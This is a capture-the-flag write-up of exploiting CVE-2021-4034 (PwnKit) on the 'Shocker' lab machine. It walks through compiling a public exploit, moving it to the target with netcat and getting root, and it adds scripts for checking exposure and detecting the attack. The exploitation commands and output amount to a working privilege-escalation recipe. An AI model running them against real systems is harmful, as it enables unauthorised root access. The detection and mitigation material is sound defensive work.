CVE-2021-4034


PEAS flagged the target system as vulnerable to CVE-2021-4034 (PwnKit)

The vulnerable program is pkexec, part of Polkit, which manages process privileges. pkexec lets non-privileged processes request actions from privileged ones and provides a controlled way for authorized users to run commands as another user, similar to sudo.

A memory corruption flaw is triggered when pkexec is executed with an empty argument list (an argc of 0). Because of the resulting out-of-bounds access, an attacker who controls the environment variables can trick pkexec into loading and executing arbitrary code with superuser privileges.
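Before reaching for an exploit, the defender-side questions are whether a host is actually exposed and what the stopgap is. The script below is an added example, not code from the writeup or from the exploit repository; it assumes pkexec lives at /usr/bin/pkexec (override with PKEXEC=...) and treats the setuid bit as the decisive exposure signal, since version strings differ between distributions.

```shell
#!/bin/sh
# Added exposure check and workaround for CVE-2021-4034; this is not code from
# the writeup or from the exploit repository. Assumption: pkexec is at
# /usr/bin/pkexec (override with PKEXEC=...). Version strings are distro
# specific, so the setuid bit is treated as the decisive exposure signal; the
# patch state itself should be confirmed through the package manager.

PKEXEC="${PKEXEC:-/usr/bin/pkexec}"

# Classify a pkexec binary. Prints one of:
#   missing        no such file, nothing to escalate through
#   setuid-root    root-owned and setuid: the precondition for PwnKit
#   setuid-other   setuid but not root-owned (unusual; still worth a look)
#   no-setuid      present but cannot grant root, so the exploit has no effect
pkexec_exposure() {
    f="$1"
    [ -e "$f" ] || { echo missing; return 0; }
    if [ -u "$f" ]; then
        owner=$(ls -ld "$f" | awk '{print $3}')
        if [ "$owner" = root ]; then echo setuid-root; else echo setuid-other; fi
    else
        echo no-setuid
    fi
}

# Documented workaround when patching has to wait: strip the setuid bit.
# pkexec then cannot elevate anyone, which also disables its legitimate use.
pkexec_mitigate() {
    chmod 0755 "$1" && pkexec_exposure "$1"
}

# Report for the real binary. Patched builds refuse to run with an empty argv,
# so the package version (e.g. dpkg -s policykit-1 on Debian/Ubuntu) is the
# other half of the check.
echo "$PKEXEC: $(pkexec_exposure "$PKEXEC")"
```

Run it as-is for a report; call `pkexec_mitigate /usr/bin/pkexec` as root only when a patch cannot be applied promptly, and re-enable the bit after patching if pkexec is needed.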

Exploit (PwnKit)


I found an exploit online

shelly@Shocker:/dev/shm$ gcc
bash: /usr/bin/python: No such file or directory
shelly@Shocker:/dev/shm$ make
bash: /usr/bin/python: No such file or directory
shelly@Shocker:/dev/shm$ cc
bash: /usr/bin/python: No such file or directory

No compiler is available on the target, so the exploit is compiled elsewhere and delivered afterwards.

Docker Exploit Development


┌──(kali㉿kali)-[~/archive/htb/labs/shocker]
└─$ docker run -it --entrypoint "/bin/bash" --name shocker  ubuntu:16.04
root@f62cf0dcc337:/# apt update -y ; apt install net-tools netcat gcc gcc-multilib nano git make wget -y

Setting up the environment

root@f62cf0dcc337:/# git clone https://github.com/berdav/CVE-2021-4034.git ; cd CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Unpacking objects: 100% (92/92), done.
Checking connectivity... done.

Downloading the exploit

root@f62cf0dcc337:/CVE-2021-4034# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
root@f62cf0dcc337:/CVE-2021-4034# cd ../ ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034

Compile & package

Exploitation


root@f62cf0dcc337:/# nc 10.10.10.56 3333 < CVE-2021-4034.tar.gz
 
shelly@Shocker:/dev/shm$ nc -nlvp 3333 > CVE-2021-4034.tar.gz
Listening on [0.0.0.0] (family 0, port 3333)
Connection from [10.10.14.2] port 3333 [tcp/*] accepted (family 2, sport 47406)
shelly@Shocker:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Delivery complete

shelly@Shocker:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
Shocker
# ifconfig
ifconfig
ens192    Link encap:Ethernet  HWaddr 00:50:56:b9:89:cf  
          inet addr:10.10.10.56  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:89cf/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:89cf/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:12218 errors:0 dropped:20 overruns:0 frame:0
          TX packets:9076 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:14850998 (14.8 MB)  TX bytes:1675313 (1.6 MB)
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:19568 errors:0 dropped:0 overruns:0 frame:0
          TX packets:19568 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:1449756 (1.4 MB)  TX bytes:1449756 (1.4 MB)

System Level Compromise
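What this run leaves behind is useful from the detection side: the exploit's Makefile stages a directory literally named "GCONV_PATH=." and a gconv-modules file registering a PWNKIT module (see the make output above), and pkexec itself writes two recognisable syslog messages when it rejects a suspicious environment. The helpers below are an added example, not part of the writeup or of the berdav repository; the directory layout and log lines they run against are constructed samples.

```shell
#!/bin/sh
# Added detection helpers; not part of the writeup or of the berdav repository.
# They look for the staging artifacts the exploit's Makefile creates (the
# "GCONV_PATH=." directory and a gconv-modules file registering PWNKIT) and for
# the pkexec syslog messages the public advisory associates with exploitation
# attempts. All sample data below is constructed.

# Count directories literally named "GCONV_PATH=." below a root. pkexec is
# tricked through this directory name and nothing legitimate creates it, so a
# single hit in /tmp, /dev/shm or a home directory is a strong indicator.
find_gconv_dirs() {
    find "$1" -type d -name 'GCONV_PATH=.' 2>/dev/null | wc -l | tr -d ' '
}

# Count gconv-modules files that register the PWNKIT module. Any gconv-modules
# file outside the distro's gconv directory deserves a look; the PWNKIT name is
# specific to this exploit.
find_gconv_modules() {
    find "$1" -type f -name 'gconv-modules' -exec grep -l 'PWNKIT' {} + 2>/dev/null \
        | wc -l | tr -d ' '
}

# Count, on stdin, the pkexec messages that the advisory lists as traces of an
# exploitation attempt. Caveat: the GCONV_PATH technique used in this writeup
# runs the payload while pkexec is formatting that message, so the message may
# never be written; absence in the log does not mean absence of exploitation.
count_pkexec_log_hits() {
    grep -c -E 'pkexec\[[0-9]+\]:.*(value for the SHELL variable was not found|contains suscipious content)' || true
}

# Constructed sample log: one benign line between two exploitation traces.
SAMPLE_AUTH_LOG='Jan 24 10:00:00 shocker pkexec[1234]: shelly: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/dev/shm] [COMMAND=]
Jan 24 10:00:01 shocker CRON[900]: pam_unix(cron:session): session opened for user root by (uid=0)
Jan 24 10:00:02 shocker pkexec[1235]: shelly: The value for environment variable [CHARSET] contains suscipious content [USER=root] [TTY=unknown] [CWD=/dev/shm] [COMMAND=]'

# Constructed sample tree: recreate the exploit's staging layout under $1.
stage_sample_tree() {
    mkdir -p "$1/CVE-2021-4034/GCONV_PATH=."
    echo "module UTF-8// PWNKIT// pwnkit 1" > "$1/CVE-2021-4034/gconv-modules"
}

# Demo against the constructed data. A real sweep would use the filesystem root
# and the system's auth log: find_gconv_dirs / ; count_pkexec_log_hits < /var/log/auth.log
demo_dir=$(mktemp -d)
stage_sample_tree "$demo_dir"
echo "GCONV_PATH=. dirs: $(find_gconv_dirs "$demo_dir")"                                   # 1
echo "PWNKIT gconv-modules files: $(find_gconv_modules "$demo_dir")"                       # 1
echo "pkexec log traces: $(printf '%s\n' "$SAMPLE_AUTH_LOG" | count_pkexec_log_hits)"      # 2
rm -rf "$demo_dir"
```

The filesystem checks are the more reliable signal for this particular exploit, since its payload fires before the log line is emitted; the log pattern still catches cruder attempts and is cheap to add to an existing syslog pipeline.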